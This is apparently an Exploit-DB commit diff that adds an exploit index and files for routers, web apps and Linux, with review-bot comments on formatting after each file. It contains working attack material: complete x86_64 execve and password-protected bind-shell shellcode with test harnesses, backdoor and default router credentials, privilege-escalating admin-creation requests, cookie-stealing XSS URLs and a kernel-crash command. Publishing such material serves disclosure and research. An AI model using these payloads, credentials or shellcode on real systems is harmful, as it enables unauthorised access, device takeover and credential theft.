DB: 2015-10-16
17 new exploits
parent 01940201cb
commit aa57287847
18 changed files with 1243 additions and 0 deletions
17
files.csv
@ -34452,6 +34452,7 @@ id,file,description,date,author,platform,type,port
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",linux,remote,0
38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload Vulnerability",2013-01-09,"Include Security Research",php,webapps,0
38150,platforms/lin_x86-64/shellcode/38150.txt,"Linux x86_64 - /bin/sh",2015-09-11,"Fanda Uchytil",lin_x86-64,shellcode,0
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
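Review bot: the hunk header announces a single added row, but this rendered view has dropped the +/- markers, so a reviewer cannot tell which of the seven rows is the new one; the ids in this region are also out of order (38203 and 38204 sit between 38148 and 38150), so if files.csv is meant to stay id-sorted the new row should be placed accordingly, and if it is not, the commit message should say which row was added.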
@ -34727,10 +34728,26 @@ id,file,description,date,author,platform,type,port
38440,platforms/php/webapps/38440.txt,"phpMyAdmin 'tbl_gis_visualization.php' Multiple Cross Site Scripting Vulnerabilities",2013-04-09,waraxe,php,webapps,0
38441,platforms/php/webapps/38441.txt,"WordPress Spiffy XSPF Player Plugin 'playlist_id' Parameter SQL Injection Vulnerability",2013-04-10,"Ashiyane Digital Security Team",php,webapps,0
38444,platforms/win32/dos/38444.py,"Tomabo MP4 Converter 3.10.12 - 3.11.12 (.m3u) Denial of service (Crush application)",2015-10-11,"mohammed Mohammed",win32,dos,0
38446,platforms/php/webapps/38446.html,"Dream CMS 2.3.0 - CSRF Add Extension And File Upload PHP Code Execution",2015-10-11,LiquidWorm,php,webapps,0
38448,platforms/hardware/webapps/38448.txt,"F5 Big-IP 10.2.4 Build 595.0 Hotfix HF3 - File Path Traversal Vulnerability",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38449,platforms/hardware/webapps/38449.txt,"Netgear Voice Gateway 2.3.0.23_2.3.23 - Multiple Vulnerabilities",2015-10-13,"Karn Ganeshen",hardware,webapps,0
38450,platforms/php/webapps/38450.txt,"Kerio Control <= 8.6.1 - Multiple Vulnerabilities",2015-10-13,"Raschin Tavakoli",php,webapps,0
38454,platforms/multiple/remote/38454.py,"Linux/MIPS Kernel NetUSB - Remote Code Execution Exploit",2015-10-14,blasty,multiple,remote,0
38455,platforms/hardware/webapps/38455.txt,"ZyXEL PMG5318-B20A - OS Command Injection Vulnerability",2015-10-14,"Karn Ganeshen",hardware,webapps,0
38456,platforms/windows/local/38456.py,"Boxoft WAV to MP3 Converter 1.1 - SEH Buffer Overflow",2015-10-14,ArminCyber,windows,local,0
38458,platforms/php/webapps/38458.txt,"WordPress Spider Video Player Plugin 'theme' Parameter SQL Injection Vulnerability",2013-04-11,"Ashiyane Digital Security Team",php,webapps,0
38459,platforms/php/webapps/38459.txt,"Request Tracker 'ShowPending' Parameter SQL Injection Vulnerability",2013-04-11,cheki,php,webapps,0
38452,platforms/windows/local/38452.txt,"CDex Genre 1.79 - Stack Buffer Overflow",2015-10-13,Un_N0n,windows,local,0
38453,platforms/hardware/remote/38453.txt,"ZHONE < S3.0.501 - Multiple Vulnerabilities",2015-10-13,"Lyon Yang",hardware,remote,0
38460,platforms/jsp/webapps/38460.txt,"jPlayer 'Jplayer.swf' Script Cross Site Scripting Vulnerability",2013-03-29,"Malte Batram",jsp,webapps,0
38461,platforms/java/webapps/38461.txt,"Hero Framework /users/login username Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
38462,platforms/java/webapps/38462.txt,"Hero Framework /users/forgot_password error Parameter XSS",2013-04-10,"High-Tech Bridge",java,webapps,0
38463,platforms/multiple/webapps/38463.txt,"Aibolit Information Disclosure Vulnerability",2013-04-13,MustLive,multiple,webapps,0
38464,platforms/hardware/remote/38464.txt,"Cisco Linksys EA2700 Router Multiple Security Vulnerabilities",2013-04-15,"Phil Purviance",hardware,remote,0
38465,platforms/linux/local/38465.txt,"Linux Kernel <= 3.2.1 Tracing Mutiple Local Denial of Service Vulnerabilities",2013-04-15,anonymous,linux,local,0
38467,platforms/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Stack Based Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
38469,platforms/lin_x86-64/shellcode/38469.c,"Linux x86_64 Bindshell with Password (92 bytes)",2015-10-15,d4sh&r,lin_x86-64,shellcode,0
38470,platforms/hardware/webapps/38470.txt,"netis RealTek Wireless Router / ADSL Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
38471,platforms/hardware/webapps/38471.txt,"PROLiNK H5004NK ADSL Wireless Modem - Multiple Vulnerabilities",2015-10-15,"Karn Ganeshen",hardware,webapps,0
38472,platforms/windows/local/38472.py,"Blat.exe 2.7.6 SMTP / NNTP Mailer - Buffer Overflow",2015-10-15,hyp3rlinx,windows,local,0
38474,platforms/windows/local/38474.txt,"Windows 10 Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",windows,local,0
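Review bot: two description fields carry typos that will appear verbatim in the searchable titles: 38444 says "Crush application" (presumably "Crash") and 38465 says "Mutiple" for "Multiple"; the author field of 38444, "mohammed Mohammed", also looks mis-cased. Separately, 38452 and 38453 are placed after 38458 and 38459 rather than in id order, and 38460 (whose PoC targets the Jplayer.swf Flash object of the jPlayer jQuery plugin) is filed under platform jsp, which does not describe the affected component; "multiple" would fit better.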
25
platforms/hardware/remote/38464.txt
Executable file
@ -0,0 +1,25 @@
source: http://www.securityfocus.com/bid/59054/info

Cisco Linksys EA2700 routers is prone to the following security vulnerabilities:

1. A security-bypass vulnerability
2. A cross-site request-forgery vulnerability
3. A cross-site scripting vulnerability

An attacker can exploit these issues to bypass certain security restrictions, steal cookie-based authentication credentials, gain access to system and other configuration files, or perform unauthorized actions in the context of a user session.

Cisco Linksys EA2700 running firmware 1.0.12.128947 is vulnerable.

The following example request is available:

POST /apply.cgi HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

submit_button=xss'%3balert(1)//934&action=Apply
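Review bot: the file lists three issue classes (security bypass, CSRF, XSS) but the single request only reproduces the reflected XSS in the submit_button parameter of /apply.cgi; nothing documents which restricted files the bypass exposes or which action the CSRF targets, so either add those details from the BID 59054 source or narrow the summary to what the request shows. The request carries no Cookie header, so the text should also say whether the reflection is reachable without an authenticated session. Grammar: "routers is prone" should be "router is prone" or "routers are prone". (Content-Length 47 does match the body.)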
218
platforms/hardware/webapps/38470.txt
Executable file
@ -0,0 +1,218 @@
# Exploit Title: [netis RealTek wireless router / ADSL modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [Vulnerability? What's this?]
# Vendor Homepage: [www.netis-systems.com]
# Version Affected: [Firmware version RTK v2.1.1]


**Vulnerability Details**

* 1. Default, weak passwords for http and ftp services *

a. *HTTP accounts*
- guest/guest
- user/user
- guest/XXXXairocon

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="guest"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>
<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/> </chain>

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/> </chain>

*XXXX -> last four digits of MAC address *

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
- user/user

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/> </chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/> </chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/> </chain>


2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.

For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
account. This is seen in the config file:

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

This user is not shown / visible in the user list when logged in as guest
(privileged user).


3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.

It is possible to silently execute HTTP requests if the user is logged in.


4. *Weak RBAC controls *

5a) *A non-root/non-admin user (user) can create and delete any other
users, including root-privileged accounts. *

In netis RealTek wireless router ADSL modem, there are three users:

guest:guest -> priv 2 is super user account with full functional access
user:user -> priv 0 -> can access only some functions
guest:XXXXairocon -> privileged backdoor login


*Normally: *

- user can create new account with restricted user privs only.
- user can change its password and only other non-root users.
- user can delete any other non-root users.

However, the application does not enforce strict rbac and it is possible
for a non-root user to create a new user with root privileges.


This is done as follows:

1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (root) -
Submit request
3. When the new root user is created successfully, it does not show up in
user list
4. Confirm via logging in as new root, and / or configured accounts in
configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=



*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
root privileged account.

*Note2*: In some cases, application does not create root priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.


*Delete user http request:*
A non-root/non-admin user can delete any configured user(s) including
privileged users (guest).

POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%



In case (non-root) user is deleting a root login (guest, priv 2), action
status can be confirmed by checking the configuration In case (non-root)
user is deleting a user login (priv 0), action status can be confirmed by
checking the user list.


5b) *(non-root priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:

http://<IP>/fw-macfilter.htm

Other functions may also be accessible in this manner.


6. *Sensitive information not secured from low privileged users *

A non-root / non-admin privileged user has access to download the
configuration file - config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *****, it is
possible to view clear-text values by 'Inspect Element' locally or
intercepting http requests, or sniffing.
--
Best Regards,
Karn Ganeshen
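Review bot: the delete-user request body on the line beginning "username=test&privilege=2&oldpass=" is cut off after "submit.htm%" (the header announces Content-Length 131 but the body shown is shorter), so the file as committed does not contain the complete request; restore the full line from the original advisory. The section numbering is inconsistent as well: "4. *Weak RBAC controls *" is followed by sub-items "5a)" and "5b)" and then by "6." and "7.", and the "# Exploit Title:" header field is wrapped onto a second line, which breaks anything that parses the one-line header format. Minor: "Host: <ip>" vs "Host: <IP>", and "cen censored" in section 7.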
219
platforms/hardware/webapps/38471.txt
Executable file
@ -0,0 +1,219 @@
# Exploit Title: [PROLiNK H5004NK ADSL Wireless Modem Multiple
Vulnerabilities]
# Discovered by: Karn Ganeshen
# Reported on: [October 13, 2015]
# Vendor Response: [No process to handle vuln reports]
# Vendor Homepage: [
http://www.prolink2u.com/newtemp/datacom/adsl-modem-router/381-h5004nk.html]
# Version Affected: [Firmware version R76S Slt 4WNE1 6.1R]


**Vulnerability Details**

*1. Default, weak passwords for http and ftp services *

a. *HTTP accounts*
- admin/password
- user/user
- guest/XXXXairocon

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="password"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x2"/>
</chain>

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="BACKDOOR" V="0x0"/>
<V N="PRIORITY" V="0x0"/> </chain>

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/> </chain>

*XXXX -> last four digits of MAC address *

b. *FTP accounts*

- admin/admin
- useradmin/useradmin
- user/user

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="admin"/>
<V N="PASSWORD" V="admin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x3"/>
<V N="INSTNUM" V="0x1"/> </chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="useradmin"/>
<V N="PASSWORD" V="useradmin"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x2"/>
<V N="INSTNUM" V="0x2"/> </chain>

<chain N="FTP_SERVER">
<V N="ENABLE" V="0x1"/>
<V N="USERNAME" V="user"/>
<V N="PASSWORD" V="user"/>
<V N="PORT" V="0x15"/>
<V N="USERRIGHT" V="0x1"/>
<V N="INSTNUM" V="0x3"/> </chain>


2. *Backdoor accounts*
The device comes configured with privileged, backdoor account.

For HTTP, 'guest' with attribute <V N="BACKDOOR" V="0x1"/>, is the backdoor
account. This is seen in the config file:

<chain N="USERNAME_PASSWORD">
<V N="FLAG" V="0x0"/>
<V N="USERNAME" V="guest"/>
<V N="PASSWORD" V="XXXXairocon"/>
<V N="BACKDOOR" V="0x1"/>
<V N="PRIORITY" V="0x1"/>
</chain>

This user is not shown / visible in the user list when logged in as admin
(privileged user).


3. *No CSRF protection*
There is no CSRF token set in any of the forms / pages.

It is possible to silently execute HTTP requests if the user is logged in.


4. *Weak RBAC controls *

5a) *A non-admin user (user) can create and delete any other users,
including root-privileged accounts. *

There are three users:

admin:password -> priv 2 is super user account with full functional access
(admin/root)
user:user -> priv 0 -> can access only some functions (user)
guest:XXXXairocon -> privileged backdoor login


*Normally: *

- user can create new account with restricted user privs only.
- user can change its password and only other non-admin users.
- user can delete any other non-admin users.

However, the application does not enforce strict rbac and it is possible
for a non-admin user to create a new account with admin privileges.


This is done as follows:

1. Start creating a new user, and intercepting the user creation POST
request
2. Intercept & Change privilege parameter value from 0 (user) to 2 (admin)
- Submit request
3. When the new admin user is created successfully, it does not show up in
user list
4. Confirm via logging in as new admin, and / or configured accounts in
configuration file (config.img)


This is the POST request to create a new user:

*Create user http request*:

POST /form2userconfig.cgi HTTP/1.1
Host: <IP>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm?v=
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 115
username=test&privilege=2&newpass=test&confpass=test&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=


*Note1*: In some cases, this password change function is not accessible to
'user' via GUI. But we can still send a POST request to create a valid, new
higher privileged account.

*Note2*: In some cases, application does not create admin priv user, in the
first attempt. However, in the 2nd or 3rd attempt, new user is created
without any issue.


*Delete user http request:*
A non-admin user can delete any configured user(s) including privileged
users (admin).

POST /form2userconfig.cgi HTTP/1.1
Host: <ip>
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:38.0) Gecko/20100101
Firefox/38.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://<IP>/userconfig.htm
Cookie: SessionID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
username=test&privilege=2&oldpass=&newpass=&confpass=&deluser=Delete&select=s3&hiddenpass=test&submit.htm%


In case (non-admin) user is deleting the admin login (priv 2), action
status can be confirmed by checking the configuration.
In case (non-admin) user is deleting another user login (priv 0), action
status can be confirmed by checking the user list.


5b) *(non-admin priv) User can access unauthorized functions.*
Normally, 'user' does not have access to all the functionality of the
device. It has access to Status, Setup and Maintenance.

However, few functions can still be accessed by calling them directly. For
example, to access the mac filtering configuration this url can be opened
directly:

http://<IP>/fw-macfilter.htm

Other functions may also be accessible in this manner.


6. *Sensitive information not secured from low privileged users *

A non-admin privileged user has access to download the configuration file
- config.img.

This file contains clear-text passwords, keys and other sensitive
information which can be used to gain privileged access.


7. *Sensitive information accessible in clear-text*

Sensitive Information like passwords and keys are not secured properly.
Mostly these are either shown in clear-text or cen censored *****, it is
possible to view clear-text values by 'Inspect Element' locally or
intercepting http requests, or sniffing.
--
Best Regards,
Karn Ganeshen
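Review bot: this file repeats the 38470 text nearly verbatim with the account names swapped and inherits the same defects: the delete-user body on the line beginning "username=test&privilege=2&oldpass=" ends at "submit.htm%" although Content-Length says 131, the "# Exploit Title:" and "# Vendor Homepage:" header fields are each wrapped over two lines, and "4. *Weak RBAC controls *" is followed by "5a)"/"5b)" and then "6."/"7.". One point specific to this file: the 5a heading says "including root-privileged accounts" while every other line here calls the priv-2 account "admin"; align the wording so the privilege model reads consistently.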
9
platforms/java/webapps/38461.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59041/info

Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Hero 3.791 is vulnerable; other versions may also be affected.

http://www.example.com/users/login?username=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
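Review bot: the file states "Hero 3.791 is vulnerable", but the files.csv description for 38461 ("Hero Framework /users/login username Parameter XSS") carries no version, unlike most other rows in this commit; add "3.791" to the title so the affected version is searchable. 38461 and 38462 also share the same BID source and identical text and differ only in the PoC URL, so a cross-reference between the two entries would help readers.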
9
platforms/java/webapps/38462.txt
Executable file
@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/59041/info

Hero is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Hero 3.791 is vulnerable; other versions may also be affected.

http://www.example.com/users/forgot_password?error=PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpOzwvc2NyaXB0Pg==
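Review bot: the value of the error parameter is base64 (it decodes to a plain script tag calling alert(document.cookie)), but the description never says that the application decodes the parameter before rendering it; one sentence stating that would make the vector understandable without decoding the URL by hand. As with 38461, the csv description for 38462 omits the "3.791" version stated here.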
7
platforms/jsp/webapps/38460.txt
Executable file
@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/59030/info

jPlayer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/Jplayer.swf?id=%3Cimg%20src=x%20onerror=alert\u0028\u0027moin\u0027\u0029%3E&jQuery=document.write
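Review bot: the PoC calls Jplayer.swf directly with id and jQuery parameters (jQuery=document.write), so the flaw lies in the Flash component of the jPlayer jQuery plugin, yet the file lives under platforms/jsp/webapps and the csv row uses platform jsp; that classification does not match the component and "multiple" would be more accurate. The text also names no affected version range, which the other SecurityFocus-derived entries in this commit do provide.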
90
platforms/lin_x86-64/shellcode/38150.txt
Executable file
@ -0,0 +1,90 @@
# Exploit Title: Shellcode /bin/sh for Linux x86_64 (different approach)
# Date: 2015-09-10
# Exploit Author: Fanda Uchytil
# Version: 1
# Tested on: Linux 3.16.0-4-amd64 (Debian), 2.6.32-openvz-042stab093.5-amd64 (Centos/RHEL based), 2.6.32-5-amd64 (Debian)


AT&T VERSION (for smooth debug)
-------------------------------

.global _start
.text
_start:
# int execve(const char *filename, char *const argv[], char *const envp[]);
xor %rax, %rax
add $59, %rax # Linux 64b execve
xor %rdi, %rdi
push %rdi # '\0' for termination of string below
mov $0x68732F2f6e69622F, %rdi # "/bin//sh" (slash padding)
push %rdi
lea (%rsp), %rdi
xor %rsi, %rsi # no shell arguments
xor %rdx, %rdx # no env vars
syscall


$ gcc -nostdlib shellcode_atnt.s -o shellcode_atnt && objdump -d shellcode_atnt
$ ./shellcode_atnt
$ gdb -q ./shellcode_atnt


Disassembly of section .text:
4000d4: 48 31 c0 xor %rax,%rax
4000d7: 48 83 c0 3b add $0x3b,%rax
4000db: 48 31 ff xor %rdi,%rdi
4000de: 57 push %rdi
4000df: 48 bf 2f 62 69 6e 2f movabs $0x68732f2f6e69622f,%rdi
4000e6: 2f 73 68
4000e9: 57 push %rdi
4000ea: 48 8d 3c 24 lea (%rsp),%rdi
4000ee: 48 31 f6 xor %rsi,%rsi
4000f1: 48 31 d2 xor %rdx,%rdx
4000f4: 0f 05 syscall




INTEL VERSION
-------------

BITS 64
xor rax, rax
add rax, 59
xor rdi, rdi
push rdi
mov rdi, 0x68732F2f6e69622F
push rdi
lea rdi, [rsp]
xor rsi, rsi
xor rdx, rdx
syscall


$ nasm shellcode.a




SHELLCODE_TEST.C
----------------

int main(int argc, char **argv) {
int (*f)() = (int(*)()) argv[1];
return (*f)();
}


$ gcc -o shellcode_test shellcode_test.c -z execstack # or use `execstack(8)` before command below
$ ./shellcode_test "$(cat shellcode)"




STRING
------

$ xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\&/g'
\48\31\c0\48\83\c0\3b\48\31\ff\57\48\bf\2f\62\69\6e\2f\2f\73\68\57\48\8d\3c\24\48\31\f6\48\31\d2\0f\05

$ ./shellcode_test "$(printf "$(xxd -p -c 256 shellcode | tr -d '\n' | sed 's/../\\x&/g')")"
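Review bot: the title promises a "different approach" but nothing in the file says what differs from the usual execve /bin//sh stub, so a sentence at the top naming the difference is needed to justify a separate entry. The size is never stated either: the STRING section shows 34 bytes (0x4000d4 to 0x4000f6 in the objdump listing), while the companion entry 38469 puts its byte count in the csv title; "Linux x86_64 - /bin/sh (34 bytes)" would be consistent. Minor: the assembly listings have lost their indentation in this view, and the first STRING command emits "\48\31..." which is not a valid C or printf escape; only the second command (with \x) produces a usable string, so the first could be dropped or its purpose stated.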
121
platforms/lin_x86-64/shellcode/38469.c
Executable file
@ -0,0 +1,121 @@
/*
;Title: bindshell with password in 92 bytes
;Author: David Velázquez a.k.a d4sh&r
;Contact: https://mx.linkedin.com/in/d4v1dvc
;Description: x64 Linux bind TCP port shellcode on port 31173 with 4 bytes as password in 94 bytes
;Tested On: Linux kali64 3.18.0-kali3-amd64 x86_64 GNU/Linux

;Compile & Run: nasm -f elf64 -o bindshell.o bindshell.nasm
; ld -o bindshell bindshell.o
; ./bindshell
;SLAE64-1379


global _start


_start:

socket:
;int socket(int domain, int type, int protocol)2,1,0
xor esi,esi ;rsi=0
mul esi ;rdx,rax,rsi=0, rdx is 3rd argument
inc esi ;rsi=1, 2nd argument
push 2
pop rdi ;rdi=2,1st argument
add al, 41 ;socket syscall
syscall

push rax ;socket result
pop rdi ;rdi=sockfd

;struct sockaddr_in {
; sa_family_t sin_family; /* address family: AF_INET */
; in_port_t sin_port; /* port in network byte order */
; struct in_addr sin_addr; /* internet address */
;};

push 2 ;AF_INET
mov word [rsp + 2], 0xc579 ;port 31173
push rsp
pop rsi ;rsi=&sockaddr

bind:
;int bind(int sockfd, const struct sockaddr *addr,socklen_t addrlen)
push rdx ;initialize with 0 to avoid SEGFAULT
push 16
pop rdx ;rdx=16 (sizeof sockaddr)
push 49 ;bind syscall
pop rax
syscall

listen:
;int listen(int sockfd, int backlog)
pop rsi
mov al, 50 ;listen syscall
syscall

accept:
;int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen)
mov al, 43 ;accept syscall
syscall

;store client
push rax ;accept result(client)
pop rdi ;rdi=client

;don't to close parent to have a small shellcode
;in a loop is necessary to close the conection!!

password:
;ssize_t read(int fd, void *buf, size_t count)
push rsp ;1st argument
pop rsi ;2nd argument
xor eax, eax ;read syscall
syscall

cmp dword [rsp], '1234' ;"1234" like password
jne error ; if wrong password then crash program

;int dup2(int oldfd, int newfd)
push 3
pop rsi

dup2:
dec esi
mov al, 33 ;dup2 syscall applied to error,output and input
syscall
jne dup2

execve:
;int execve(const char *filename, char *const argv[],char *const envp[])
push rsi
pop rdx ;3rd argument
push rsi ;2nd argument
mov rbx, 0x68732f2f6e69622f ;1st argument /bin//sh
push rbx
push rsp
pop rdi
mov al, 59 ;execve
syscall

error:
;SEGFAULT

*/

#include<stdio.h>
#include<string.h>
//gcc -fno-stack-protector -z execstack shellcode.c -o shellcode
unsigned char code[] = \
"\x31\xf6\xf7\xe6\xff\xc6\x6a\x02\x5f\x04\x29\x0f\x05\x50\x5f\x6a\x02\x66\xc7\x44\x24\x02\x79\xc5\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\xb0\x32\x0f\x05\xb0\x2b\x0f\x05\x50\x5f\x54\x5e\x31\xc0\x0f\x05\x81\x3c\x24\x31\x32\x33\x34\x75\x1f\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x56\x5a\x56\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05";

main()
{

printf("Shellcode Length: %d\n", strlen(code));

int (*ret)() = (int(*)())code;
ret();

}
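Review bot: the size is stated inconsistently: the Title line says 92 bytes, the Description line says 94 bytes, and the code[] array actually holds 92 bytes (the files.csv title also says 92), so the Description line needs correcting. Two behaviours worth a comment for readers: the error: label carries no instruction, so on a wrong password the jne (encoded as \x75\x1f, i.e. a jump to the end of the buffer) falls through into whatever bytes follow code[] in memory, which is a crash only by accident rather than a deliberate exit; and the dup2 loop's jne relies on the flags set by dec esi surviving the intervening syscall, which holds on Linux x86-64 because the kernel restores RFLAGS from r11. In the C harness, main() has no return type and strlen's size_t result is printed with %d; `int main(void)` and `%zu` compile cleanly with -Wall.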
8
platforms/linux/local/38465.txt
Executable file
@ -0,0 +1,8 @@
source: http://www.securityfocus.com/bid/59055/info

The Linux kernel is prone to multiple local denial-of-service vulnerabilities.

Attackers can exploit these issues to trigger a kernel crash, which may result in a denial-of-service condition.

cd /sys/kernel/debug/tracing
echo 1234 | sudo tee -a set_ftrace_pid
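Review bot: the PoC writes to set_ftrace_pid through sudo, so as written it needs root and a mounted debugfs; the sentence "Attackers can exploit these issues" should say that only a user who can already write under /sys/kernel/debug/tracing can trigger the crash, otherwise the "local" severity is overstated. The two commands also come with no word on which tracing code path fails, so a one-line note taken from the BID 59055 source (and the csv's "<= 3.2.1" version bound, which this file does not repeat) would make the entry self-contained.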
7
platforms/multiple/webapps/38463.txt
Executable file
7
platforms/multiple/webapps/38463.txt
Executable file
|
@ -0,0 +1,7 @@
|
|||
source: http://www.securityfocus.com/bid/59053/info

Aibolit is prone to an information-disclosure vulnerability.

Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.

